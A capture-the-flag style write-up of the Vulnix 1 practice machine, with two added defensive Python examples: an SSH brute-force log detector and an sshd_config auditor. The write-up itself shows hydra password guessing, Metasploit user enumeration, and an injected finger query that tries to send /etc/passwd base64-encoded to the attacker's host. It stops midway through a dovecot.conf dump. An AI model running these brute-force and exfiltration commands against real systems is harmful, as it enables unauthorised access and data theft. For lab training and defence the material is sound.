Vulnix 1
The description for this one says the issues are with software configuration rather than specifically vulnerable versions of software! So, I'll try to do this one without abusing the old versions of software bundled in; it was released 8 years ago, after all... I think I need to move on to newer stuff soon.
Nmap scan report for 192.168.173.130
Host is up (0.0016s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
79/tcp open finger
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
512/tcp open exec
513/tcp open login
514/tcp open shell
993/tcp open imaps
995/tcp open pop3s
2049/tcp open nfs
MAC Address: 00:0C:29:61:FF:DC (VMware)
Wow, that's a lot of services! We have a big hint for this one: we're expecting misconfigured services. Let's start with SSH:
$ ssh -v root@192.168.173.130
...
debug1: Authentications that can continue: publickey,password
Allowing SSH login as root is certainly a misconfiguration! But really all we can do with it, for now, is try to brute-force root access.
└─$ hydra -l root -P /usr/share/wordlists/metasploit/password.lst ssh://192.168.173.130 255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 10:08:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 88397 login tries (l:1/p:88397), ~5525 tries per task
[DATA] attacking ssh://192.168.173.130:22/
I highly doubt this will get us in, but I'll let it run regardless! I also started an SMTP user enumeration module in Metasploit, which got me some results:
msf6 auxiliary(scanner/smtp/smtp_enum) > run
[*] 192.168.173.130:25 - 192.168.173.130:25 Banner: 220 vulnix ESMTP Postfix (Ubuntu)
[+] 192.168.173.130:25 - 192.168.173.130:25 Users found: , backup, bin, daemon, games, gnats, irc, landscape, libuuid, list, lp, mail, man, messagebus, news, nobody, postfix, postmaster, proxy, sshd, sync, sys, syslog, user, uucp, whoopsie, www-data
[*] 192.168.173.130:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
So, I started a short brute-force on `user`, and on `whoopsie` too, because that just seemed too default:
└─$ hydra -l user -p /usr/share/wordlists/metasploit/http_default_pass.txt ssh://192.168.173.130 255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 10:25:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.173.130:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-10 10:25:35
└─$ hydra -l whoopsie -p /usr/share/wordlists/metasploit/http_default_pass.txt ssh://192.168.173.130 255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 10:25:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.173.130:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-10 10:25:35
Now I want to turn my attention to all those non-standard services; let's poke at them with a TCP connection:
└─$ nc 192.168.173.130 512
Where are you?
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 192.168.173.130 513
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 192.168.173.130 513 id
invalid port id
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 192.168.173.130 514
getnameinfo: Temporary failure in name resolution
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v 192.168.173.130 79 255 ⨯
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
No one logged on.
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
user
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Login: dovenull Name: Dovecot login user
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
root
Login: root Name: root
Directory: /root Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Interesting! This is letting us run the `finger` binary... This is basically like getting an SUID binary? Taking a look at GTFOBins, finger is there!
- https://gtfobins.github.io/gtfobins/finger/
We may be able to gain upload/download of files! Let's try to download a file...
# Start a local listener to wait for the file
$ sudo nc -l -p 79 | base64 -d > "local_file"
# Use finger over nc to download a file
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
"$(base64 /etc/passwd)@192.168.173.129"
fingerd: forwarding not allowed
# Try an upload
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
kali@192.168.173.129 | base64 -d > "test"
fingerd: forwarding not allowed
Looks like this method is blocked; fingerd refuses to forward requests. I'm going to move on for a while... Turning my attention to NFS and rpcbind:
msf6 > use auxiliary/scanner/nfs/nfsmount
msf6 auxiliary(scanner/nfs/nfsmount) > info
Name: NFS Mount Scanner
Module: auxiliary/scanner/nfs/nfsmount
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
tebo <tebo@attackresearch.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PROTOCOL udp yes The protocol to use (Accepted: udp, tcp)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 111 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
This module scans NFS mounts and their permissions.
References:
https://cvedetails.com/cve/CVE-1999-0170/
http://www.ietf.org/rfc/rfc1094.txt
msf6 auxiliary(scanner/nfs/nfsmount) > set RHOSTS 192.168.173.130
RHOSTS => 192.168.173.130
msf6 auxiliary(scanner/nfs/nfsmount) > set RPORT 2049
RPORT => 2049
msf6 auxiliary(scanner/nfs/nfsmount) > run
[*] 192.168.173.130:2049 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/nfs/nfsmount) > set RPORT 111
RPORT => 111
msf6 auxiliary(scanner/nfs/nfsmount) > run
[+] 192.168.173.130:111 - 192.168.173.130 NFS Export: /home/vulnix [*]
[*] 192.168.173.130:111 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
While learning how to mount this, I stumbled across a potential root vector:
- https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
I'll come back to this if we get a shell! Anyway, I mounted the remote NFS drive:
$ sudo mount 192.168.173.130:/home/vulnix /home/kali/Desktop/tmp/test
$ ls -al ./test
ls: cannot open directory 'test': Permission denied
$ ls -al
total 12
drwxr-xr-x 3 kali kali 4096 Jan 10 16:14 .
drwxr-xr-x 3 kali kali 4096 Jan 10 16:13 ..
drwxr-x--- 2 nobody 4294967294 4096 Sep 2 2012 test
I don't think I can get any further here, but this will be a valuable privilege escalation vector later on. Back to trying to get a shell on the system... I did some more research: the services on ports 513 and 514 are rlogin and rexec. Here's me testing login without a password via rexec:
└─# rsh -l root 192.168.173.130
The authenticity of host '192.168.173.130 (192.168.173.130)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.173.130' (ECDSA) to the list of known hosts.
root@192.168.173.130's password:
Permission denied, please try again.
root@192.168.173.130's password:
Permission denied, please try again.
root@192.168.173.130's password:
root@192.168.173.130: Permission denied (publickey,password).
┌──(root💀kali)-[/mnt]
└─# rsh -l vulnix 192.168.173.130 255 ⨯
vulnix@192.168.173.130's password:
Permission denied, please try again.
vulnix@192.168.173.130's password:
Permission denied, please try again.
vulnix@192.168.173.130's password:
vulnix@192.168.173.130: Permission denied (publickey,password).
And rlogin:
└─$ rlogin -l root -p 513 192.168.173.130
kex_exchange_identification: read: Connection reset by peer
Connection reset by 192.168.173.130 port 513
I've been poking around for hours and I really can't find anything overly useful, so I'm going to circle back to the basics for a while... Using finger, let's confirm the user list I enumerated earlier:
# Test `user`
└─# nc 192.168.173.130 79 127 ⨯
user
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Never logged in.
No mail.
No Plan.
└─# nc 192.168.173.130 79
whoopsie
Login: whoopsie Name:
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
Okay, so it seems the only account created was `user`; let's try a broader brute-force...
$ hydra -v -l user -P /usr/share/wordlists/metasploit/common_roots.txt ssh://192.168.173.130 -t 4
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 17:56:48
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4725 login tries (l:1/p:4725), ~1182 tries per task
[DATA] attacking ssh://192.168.173.130:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://user@192.168.173.130:22
[INFO] Successful, password authentication is supported by ssh://192.168.173.130:22
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 4681 to do in 01:47h, 4 active
My thought here is that allowing password auth over SSH can easily be considered a misconfiguration, so it's worth focusing on some more? I went to get some food.
[STATUS] 33.67 tries/min, 101 tries in 00:03h, 4624 to do in 02:18h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 4521 to do in 02:36h, 4 active
[STATUS] 29.40 tries/min, 441 tries in 00:15h, 4284 to do in 02:26h, 4 active
[STATUS] 28.52 tries/min, 884 tries in 00:31h, 3841 to do in 02:15h, 4 active
[STATUS] 28.60 tries/min, 1344 tries in 00:47h, 3381 to do in 01:59h, 4 active
[STATUS] 28.20 tries/min, 1784 tries in 01:03h, 2941 to do in 01:45h, 4 active
[STATUS] 28.31 tries/min, 2244 tries in 01:19h, 2481 to do in 01:28h, 4 active
[STATUS] 28.38 tries/min, 2704 tries in 01:35h, 2021 to do in 01:12h, 4 active
[22][ssh] host: 192.168.173.130 login: user password: letmein
[STATUS] attack finished for 192.168.173.130 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-10 19:41:00
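As an added example (not from the original write-up): the run above produced roughly 28 failed logins a minute from one source for almost two hours, which is exactly the pattern a defender looks for in /var/log/auth.log. The detector below is mine; the log lines are constructed to mimic Ubuntu sshd entries, using the hostname vulnix and the attacking box's address 192.168.173.129 from the write-up, plus a constructed legitimate admin login from 192.168.173.1.

```python
"""Sliding-window detector for SSH password guessing, run over sshd lines
from auth.log. Added example, not part of the original write-up; the log
excerpt is constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Ubuntu sshd auth.log format, e.g.
# Jan 10 18:00:00 vulnix sshd[3000]: Failed password for user from 192.168.173.129 port 50000 ssh2
LINE = re.compile(
    r"^(?P<ts>\w{3} \d\d \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)
WINDOW = 60     # seconds
THRESHOLD = 10  # failures per source inside the window; hydra -t 4 did ~28/min above


def parse(line, year=2021):
    """Return (timestamp, result, user, ip) or None for a non-auth line."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect(lines, window=WINDOW, threshold=THRESHOLD):
    """Return (ip, kind, detail) alerts.

    'bruteforce' fires once when a source reaches `threshold` failures within
    `window` seconds; 'success_after_bruteforce' fires for every later
    successful login from that source, which is the event worth paging on.
    """
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        if result == "Failed":
            q = failures[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window:   # drop stale failures
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce",
                               f"{len(q)} failures in {window}s, latest target '{user}'"))
        elif ip in flagged:
            alerts.append((ip, "success_after_bruteforce", f"logged in as '{user}'"))
    return alerts


def sample_log():
    """Constructed excerpt: 30 guesses from 192.168.173.129 at one every 2 s,
    an admin typo and key login from 192.168.173.1, then the guess that hits."""
    lines = [
        f"Jan 10 18:00:{2 * i:02d} vulnix sshd[{3000 + i}]: Failed password for user "
        f"from 192.168.173.129 port {50000 + i} ssh2"
        for i in range(30)
    ]
    lines.insert(5, "Jan 10 18:00:09 vulnix sshd[2999]: Failed password for admin "
                    "from 192.168.173.1 port 40000 ssh2")
    lines.insert(9, "Jan 10 18:00:15 vulnix sshd[2998]: Accepted publickey for admin "
                    "from 192.168.173.1 port 40001 ssh2")
    lines.append("Jan 10 18:01:05 vulnix sshd[3100]: Accepted password for user "
                 "from 192.168.173.129 port 50100 ssh2")
    return lines


if __name__ == "__main__":
    for ip, kind, detail in detect(sample_log()):
        print(f"{kind:26} {ip:16} {detail}")
```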
WOHOO!! Now that we have a shell, I want to check my anticipated root vector:
user@vulnix:/$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
Ah, nope: root_squash is set, so this isn't going to help us. Onwards with the usual poking...
user@vulnix:/$ find / -perm -4000 2>/dev/null
/sbin/mount.nfs
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/bin/mtr
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/procmail
/bin/ping6
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
user@vulnix:/$ ps aux | grep root
root 1 0.0 0.3 3516 1908 ? Ss 09:32 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 09:32 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 09:32 0:00 [ksoftirqd/0]
root 6 0.0 0.0 0 0 ? S 09:32 0:00 [migration/0]
root 7 0.0 0.0 0 0 ? S 09:32 0:00 [watchdog/0]
root 8 0.0 0.0 0 0 ? S< 09:32 0:00 [cpuset]
root 9 0.0 0.0 0 0 ? S< 09:32 0:00 [khelper]
root 10 0.0 0.0 0 0 ? S 09:32 0:00 [kdevtmpfs]
root 11 0.0 0.0 0 0 ? S< 09:32 0:00 [netns]
root 12 0.0 0.0 0 0 ? S 09:32 0:00 [sync_supers]
root 13 0.0 0.0 0 0 ? S 09:32 0:00 [bdi-default]
root 14 0.0 0.0 0 0 ? S< 09:32 0:00 [kintegrityd]
root 15 0.0 0.0 0 0 ? S< 09:32 0:00 [kblockd]
root 16 0.0 0.0 0 0 ? S< 09:32 0:00 [ata_sff]
root 17 0.0 0.0 0 0 ? S 09:32 0:00 [khubd]
root 18 0.0 0.0 0 0 ? S< 09:32 0:00 [md]
root 21 0.0 0.0 0 0 ? S 09:32 0:00 [khungtaskd]
root 22 0.0 0.0 0 0 ? S 09:32 0:00 [kswapd0]
root 23 0.0 0.0 0 0 ? SN 09:32 0:00 [ksmd]
root 24 0.0 0.0 0 0 ? S 09:32 0:00 [fsnotify_mark]
root 25 0.0 0.0 0 0 ? S 09:32 0:00 [ecryptfs-kthrea]
root 26 0.0 0.0 0 0 ? S< 09:32 0:00 [crypto]
root 34 0.0 0.0 0 0 ? S< 09:32 0:00 [kthrotld]
root 37 0.0 0.0 0 0 ? S 09:32 0:00 [scsi_eh_0]
root 38 0.0 0.0 0 0 ? S 09:32 0:00 [scsi_eh_1]
root 39 0.0 0.0 0 0 ? S 09:32 0:00 [kworker/u:3]
root 60 0.0 0.0 0 0 ? S< 09:32 0:00 [devfreq_wq]
root 183 0.0 0.0 0 0 ? S< 09:32 0:00 [mpt_poll_0]
root 186 0.0 0.0 0 0 ? S< 09:32 0:00 [mpt/0]
root 191 0.0 0.0 0 0 ? S 09:32 0:00 [scsi_eh_2]
root 204 0.0 0.0 0 0 ? S< 09:32 0:00 [kdmflush]
root 212 0.0 0.0 0 0 ? S< 09:32 0:00 [kdmflush]
root 226 0.0 0.0 0 0 ? S 09:32 0:00 [jbd2/dm-0-8]
root 227 0.0 0.0 0 0 ? S< 09:32 0:00 [ext4-dio-unwrit]
root 420 0.0 0.1 2816 612 ? S 09:32 0:00 upstart-udev-bridge --daemon
root 422 0.0 0.2 3096 1212 ? Ss 09:32 0:00 /sbin/udevd --daemon
root 515 0.0 0.0 0 0 ? S< 09:32 0:00 [kpsmoused]
root 621 0.0 0.1 3092 816 ? S 09:32 0:00 /sbin/udevd --daemon
root 638 0.0 0.1 3092 816 ? S 09:32 0:00 /sbin/udevd --daemon
root 706 0.0 0.1 2680 996 ? Ss 09:32 0:00 rpcbind -w
root 760 0.0 0.0 0 0 ? S< 09:32 0:00 [rpciod]
root 791 0.0 0.0 0 0 ? S< 09:32 0:00 [nfsiod]
root 799 0.0 0.1 2892 772 ? Ss 09:32 0:00 rpc.idmapd
root 812 0.0 0.1 2828 600 ? S 09:32 0:00 upstart-socket-bridge --daemon
root 851 0.0 0.1 2908 812 ? Ss 09:32 0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root 874 0.0 0.4 6664 2412 ? Ss 09:32 0:06 /usr/sbin/sshd -D
root 957 0.0 0.1 4612 832 tty4 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty4
root 961 0.0 0.1 4612 840 tty5 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty5
root 969 0.0 0.1 4612 836 tty2 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty2
root 971 0.0 0.1 4612 836 tty3 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty3
root 978 0.0 0.1 4612 832 tty6 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty6
root 994 0.0 0.1 2412 716 ? S 09:32 0:00 /usr/sbin/inetutils-inetd
root 997 0.0 0.2 2992 1140 ? Ss 09:32 0:00 /usr/sbin/dovecot -F -c /etc/dovecot/dovecot.conf
root 1002 0.0 0.1 2156 604 ? Ss 09:32 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root 1003 0.0 0.1 2600 764 ? Ss 09:32 0:00 cron
root 1032 0.0 0.1 2700 928 ? S 09:32 0:00 dovecot/log
root 1034 0.0 0.6 5088 3068 ? S 09:32 0:00 dovecot/config
root 1055 0.0 0.0 0 0 ? S 09:32 0:00 [lockd]
root 1056 0.0 0.0 0 0 ? S< 09:32 0:00 [nfsd4]
root 1057 0.0 0.0 0 0 ? S< 09:32 0:00 [nfsd4_callbacks]
root 1058 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1059 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1060 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1061 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1062 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1063 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1064 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1065 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1069 0.0 0.3 3568 1760 ? Ss 09:32 0:00 /usr/sbin/rpc.mountd --manage-gids
root 1173 0.0 0.2 4560 1468 ? Ss 09:32 0:00 /usr/lib/postfix/master
root 1215 0.0 0.1 4612 848 tty1 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty1
root 1218 0.0 0.0 0 0 ? S 09:32 0:00 [flush-252:0]
root 8781 0.0 0.0 0 0 ? S 13:22 0:00 [kworker/u:1]
root 10353 0.0 0.0 0 0 ? S 15:51 0:01 [kworker/0:2]
root 10468 0.0 0.6 9632 3052 ? Ss 16:00 0:00 sshd: user [priv]
root 11172 0.0 0.0 0 0 ? S 16:33 0:00 [kworker/0:1]
root 11368 0.0 0.0 0 0 ? S 17:03 0:00 [kworker/0:0]
user 11370 0.0 0.1 4372 828 pts/0 S+ 17:05 0:00 grep --color=auto root
user@vulnix:/$ cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details
# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes
# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768
# Logging
SyslogFacility AUTH
LogLevel INFO
# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes
RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile %h/.ssh/authorized_keys
# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no
#MaxStartups 10:30:60
#Banner /etc/issue.net
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
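An added example (not from the original write-up) that checks an sshd_config for exactly what the dump above reveals: `PermitRootLogin yes` is set, and `PasswordAuthentication` appears only as a comment, so sshd's default of yes applies, which is what let the brute force through. The parser follows sshd's own rules (case-insensitive keywords, first occurrence wins, compiled-in defaults for absent keywords); the sample config is an excerpt of the one above, the defaults table is for older OpenSSH releases like the one on this box, and the function names are mine.

```python
"""Audit sshd_config the way sshd reads it: keywords are case-insensitive,
the first occurrence of a keyword wins, and an absent (or commented-out)
keyword takes the compiled-in default. Added example, not part of the
original write-up.
"""
import re

# Defaults for absent keywords on older OpenSSH releases such as this box's;
# OpenSSH 7.0+ changed PermitRootLogin's default to prohibit-password.
DEFAULTS = {
    "protocol": "2",
    "permitrootlogin": "yes",
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
    "x11forwarding": "no",
}


def parse_sshd_config(text):
    """Return {keyword: value}; accepts 'Key value' and 'Key=value' forms.

    Stops at the first Match block, whose settings are conditional.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"(\w+)\s*=?\s*(.*)", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        settings.setdefault(key, value)   # sshd ignores later duplicates
    return settings


def effective(settings, key):
    """(value sshd will use, where it came from)."""
    if key in settings:
        return settings[key].lower(), "set in file"
    return DEFAULTS.get(key, "").lower(), "default, keyword absent or commented out"


def audit_sshd(text):
    """Findings for the settings this write-up shows being abused."""
    s = parse_sshd_config(text)
    findings = []
    proto, _ = effective(s, "protocol")
    if "1" in proto.split(","):
        findings.append("Protocol 1 enabled: obsolete, remove it")
    for key, label, advice in (
        ("permitrootlogin", "PermitRootLogin", "root can be guessed directly; use 'no' or 'prohibit-password'"),
        ("passwordauthentication", "PasswordAuthentication", "online guessing works; use keys only"),
        ("permitemptypasswords", "PermitEmptyPasswords", "accounts with no password can log in"),
        ("x11forwarding", "X11Forwarding", "not needed on a server"),
    ):
        value, source = effective(s, key)
        if value == "yes":
            findings.append(f"{label} yes ({source}): {advice}")
    return findings


# Excerpt of the sshd_config dumped from the box above.
VULNIX_SSHD_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin yes
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes
X11Forwarding yes
UsePAM yes
"""

# The same file with the fixes a defender would make (constructed).
HARDENED = (
    VULNIX_SSHD_CONFIG.replace("PermitRootLogin yes", "PermitRootLogin no")
    .replace("#PasswordAuthentication yes", "PasswordAuthentication no")
    .replace("X11Forwarding yes", "X11Forwarding no")
)

if __name__ == "__main__":
    for name, cfg in (("vulnix", VULNIX_SSHD_CONFIG), ("hardened", HARDENED)):
        print(name, audit_sshd(cfg) or ["no findings"])
```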
user@vulnix:/etc$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
Dovecot, if misconfigured, can apparently result in RCE, and it's running as root... so let's try?
user@vulnix:~$ ps aux | grep dovecot
root 997 0.0 0.2 2992 1140 ? Ss 09:32 0:00 /usr/sbin/dovecot -F -c /etc/dovecot/dovecot.conf
dovecot 1031 0.0 0.1 2704 832 ? S 09:32 0:00 dovecot/anvil
root 1032 0.0 0.1 2700 928 ? S 09:32 0:00 dovecot/log
root 1034 0.0 0.6 5088 3068 ? S 09:32 0:00 dovecot/config
user 13079 0.0 0.1 4368 832 pts/0 S+ 20:47 0:00 grep --color=auto dovecot
user@vulnix:~$ cat /etc/dovecot/dovecot.conf
## Dovecot configuration file
# If you're in a hurry, see http://wiki2.dovecot.org/QuickConfiguration
# "doveconf -n" command gives a clean output of the changed settings. Use it
# instead of copy&pasting files when posting to the Dovecot mailing list.
# '#' character and everything after it is treated as comments. Extra spaces
# and tabs are ignored. If you want to use either of these explicitly, put the
# value inside quotes, eg.: key = "# char and trailing whitespace "
# Default values are shown for each setting, it's not required to uncomment
# those. These are exceptions to this though: No sections (e.g. namespace {})
# or plugin settings are added by default, they're listed only as examples.
# Paths are also just examples with the real defaults being based on configure
# options. The paths listed here are for configure --prefix=/usr
# --sysconfdir=/etc --localstatedir=/var
# Enable installed protocols
!include_try /usr/share/dovecot/protocols.d/*.protocol
# A comma separated list of IPs or hosts where to listen in for connections.
# "*" listens in all IPv4 interfaces, "::" listens in all IPv6 interfaces.
# If you want to specify non-default ports or anything more complex,
# edit conf.d/master.conf.
#listen = *, ::
# Base directory where to store runtime data.
#base_dir = /var/run/dovecot/
# Name of this instance. Used to prefix all Dovecot processes in ps output.
#instance_name = dovecot
# Greeting message for clients.
#login_greeting = Dovecot ready.
# Space separated list of trusted network ranges. Connections from these
# IPs are allowed to override their IP addresses and ports (for logging and
# for authentication checks). disable_plaintext_auth is also ignored for
# these networks. Typically you'd specify your IMAP proxy servers here.
#login_trusted_networks =
# Sepace separated list of login access check sockets (e.g. tcpwrap)
#login_access_sockets =
# Show more verbose process titles (in ps). Currently shows user name and
# IP address. Useful for seeing who are actually using the IMAP processes
